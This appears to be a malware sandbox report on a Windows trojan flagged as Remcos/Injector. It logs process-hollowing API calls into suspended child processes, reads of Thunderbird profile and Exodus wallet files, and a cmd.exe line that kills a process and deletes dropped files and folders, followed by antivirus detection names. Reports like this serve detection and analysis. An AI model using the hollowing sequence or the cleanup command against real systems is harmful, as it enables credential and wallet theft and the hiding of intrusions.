regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
process cbvjns.exe useragent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process vcxfse.exe useragent
Process injection Process 2776 called NtSetContextThread to modify thread in remote process 1304
Process injection Process 204 called NtSetContextThread to modify thread in remote process 2364
Process injection Process 1824 called NtSetContextThread to modify thread in remote process 1808
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 4792320
registers.esp: 1638384
registers.edi: 0
registers.eax: 4454519
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000260
process_identifier: 1304
1 0 0

NtSetContextThread

 registers.eip: 4407296
registers.esp: 1638384
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000118
process_identifier: 2364
1 0 0

NtSetContextThread

 registers.eip: 4325376
registers.esp: 1638384
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000118
process_identifier: 1808
1 0 0
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 2776 resumed a thread in remote process 1304
Process injection Process 204 resumed a thread in remote process 2364
Process injection Process 1824 resumed a thread in remote process 1808
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000260
suspend_count: 1
process_identifier: 1304
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2364
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 1808
1 0 0
Time & API Arguments Status Return Repeated

__anomaly__

 tid: 2832
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 1972
thread_handle: 0x000002b0
process_identifier: 204
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\vcxfse.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vcxfse.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vcxfse.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b8
1 1 0

CreateProcessInternalW

 thread_identifier: 1556
thread_handle: 0x000002b0
process_identifier: 1824
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\cbvjns.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\cbvjns.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\cbvjns.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a4
1 1 0

CreateProcessInternalW

 thread_identifier: 1444
thread_handle: 0x00000260
process_identifier: 1304
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\ghjk.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ghjk.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000254
1 1 0

NtGetContextThread

 thread_handle: 0x00000260
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 1304
process_handle: 0x00000254
1 0 0

NtMapViewOfSection

 section_handle: 0x0000024c
process_identifier: 1304
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 614400
process_handle: 0x00000254
1 0 0

NtSetContextThread

 registers.eip: 4792320
registers.esp: 1638384
registers.edi: 0
registers.eax: 4454519
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000260
process_identifier: 1304
1 0 0

NtResumeThread

 thread_handle: 0x00000260
suspend_count: 1
process_identifier: 1304
1 0 0

CreateProcessInternalW

 thread_identifier: 1940
thread_handle: 0x00000118
process_identifier: 2364
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vcxfse.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\vcxfse.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000120
1 1 0

NtGetContextThread

 thread_handle: 0x00000118
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2364
process_handle: 0x00000120
1 0 0

NtMapViewOfSection

 section_handle: 0x000000e0
process_identifier: 2364
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 229376
process_handle: 0x00000120
1 0 0

NtSetContextThread

 registers.eip: 4407296
registers.esp: 1638384
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000118
process_identifier: 2364
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2364
1 0 0

CreateProcessInternalW

 thread_identifier: 2772
thread_handle: 0x00000118
process_identifier: 1808
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\cbvjns.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\cbvjns.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000120
1 1 0

NtGetContextThread

 thread_handle: 0x00000118
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 1808
process_handle: 0x00000120
1 0 0

NtMapViewOfSection

 section_handle: 0x000000e0
process_identifier: 1808
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 147456
process_handle: 0x00000120
1 0 0

NtSetContextThread

 registers.eip: 4325376
registers.esp: 1638384
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2000355780
thread_handle: 0x00000118
process_identifier: 1808
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 1808
1 0 0

NtResumeThread

 thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 1304
1 0 0

NtResumeThread

 thread_handle: 0x000000f4
suspend_count: 1
process_identifier: 1808
1 0 0

CreateProcessInternalW

 thread_identifier: 1068
thread_handle: 0x00000294
process_identifier: 2492
current_directory: C:\ProgramData
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000028c
1 1 0

CreateProcessInternalW

 thread_identifier: 2744
thread_handle: 0x00000084
process_identifier: 108
current_directory: C:\ProgramData
filepath: C:\Windows\System32\taskkill.exe
track: 1
command_line: taskkill /pid 2364
filepath_r: C:\Windows\system32\taskkill.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Bkav W32.AIDetect.malware1
Lionic Trojan.Win32.Malicious.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37527811
FireEye Generic.mg.be1aaef37143496d
ALYac Trojan.GenericKD.37527811
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 00581be81 )
Alibaba Trojan:Win32/Injector.bb6ce598
K7GW Trojan ( 00581be81 )
CrowdStrike win/malicious_confidence_100% (W)
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EQAA
APEX Malicious
Paloalto generic.ml
Kaspersky Trojan.Win32.Chapak.fbiq
BitDefender Trojan.GenericKD.37527811
NANO-Antivirus Trojan.Win32.Chapak.jacmkg
Avast Win32:PWSX-gen [Trj]
Tencent Win32.Trojan.Barys.Pgcw
Ad-Aware Trojan.GenericKD.37527811
Sophos Mal/Generic-S
Comodo Malware@#1p5w9bb6wj2w1
DrWeb Trojan.Siggen14.62490
McAfee-GW-Edition GenericRXPU-QT!BE1AAEF37143
Emsisoft Trojan.GenericKD.37527811 (B)
Ikarus Trojan.Win32.Injector
Webroot W32.Trojan.Gen
Avira TR/Dropper.Gen
MAX malware (ai score=88)
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft Trojan.Win32.Downloader.oa
Microsoft Trojan:Win32/Remcos.ARK!MTB
GData Trojan.GenericKD.37527811
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Remcos.R440126
McAfee GenericRXPU-QT!BE1AAEF37143
VBA32 BScope.TrojanPSW.Stelega
Malwarebytes Backdoor.Remcos
Rising Trojan.Injector!1.C6AF (CLASSIC)
SentinelOne Static AI - Malicious PE
Fortinet W32/GenKryptik.FJIT!tr
BitDefenderTheta Gen:NN.ZevbaF.34126.8m0@a8AoB2D
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.371434
Panda Trj/GdSda.A
MaxSecure Trojan.Malware.300983.susgen